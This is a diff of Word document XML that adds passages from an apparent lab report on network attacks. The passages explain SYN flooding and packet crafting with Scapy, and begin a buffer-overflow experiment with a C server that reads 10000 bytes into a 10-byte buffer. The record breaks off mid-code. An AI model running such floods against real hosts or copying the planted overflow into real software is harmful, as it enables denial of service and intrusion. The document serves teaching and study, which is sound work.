+        <w:t>), thus resulting in denial of service.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ore about DOS attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:sz w:val="24"/>
@@ -4431,8 +5512,377 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sends a TCP SYN (S flag) packet to begin a connection to the server. The target server replies with a TCP SYN-ACK (SA flag) packet, but the client does not respond to the SYN-ACK, leaving the TCP connection “half-open”. In normal operation, the client should send an ACK (a flag) packet followed by the data to be transferred, or an RST reply to reset the connection. On the target server, the connection is kept open, in a “SYN_RECV” state, as the ACK packet may have been lost due to network problems.</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> sends a TCP SYN (S flag) packet to begin a connection to the server. The target server replies with a TCP SYN-ACK (SA flag) packet, but the client does not respond to the SYN-ACK, leaving the TCP connection “half-open”. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>In normal operation, the client should send an ACK (a flag) packet followed by the data to be transferred, or an RST reply to reset the connection. On the target server, the connection is kept open, in a “SYN_RECV” state, as the ACK packet may have been lost due to network problems.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">How we malformed/crafted the packet? </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>steps involved in packet crafting.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Packet Assembly</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>: Creating a new network packet or capture a packet going over the wire and edit the information as per requirement.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Packet Editing</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>: Editing the content of an existing packet</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Packet Re/Play</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>: Send/Resend a packet in a network</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Packet decoding</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>: Decode and analyze the content of the packet</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>There are many packet crafting tools available for free such as Hping,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Scapy,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Ostinato,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Netcat etc.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>or our purpose we have used Scapy.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. Scapy can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4440,6 +5890,706 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Our Other Experiments</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Mal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>formed Payload for a buffer overflow attack:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Please see </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="24"/>
+          </w:rPr>
+          <w:t>TitaniumOrca/exploit</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Here a C server is spawned:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>void run_python() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>while (1) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>int new_socket = sock_create();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>printf("Created Socket\n");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>char line[10] = {0};</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>int valread = read(new_socket , line, 10000);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>printf("%s\n", line);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>// printf("Hello message sent\n");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
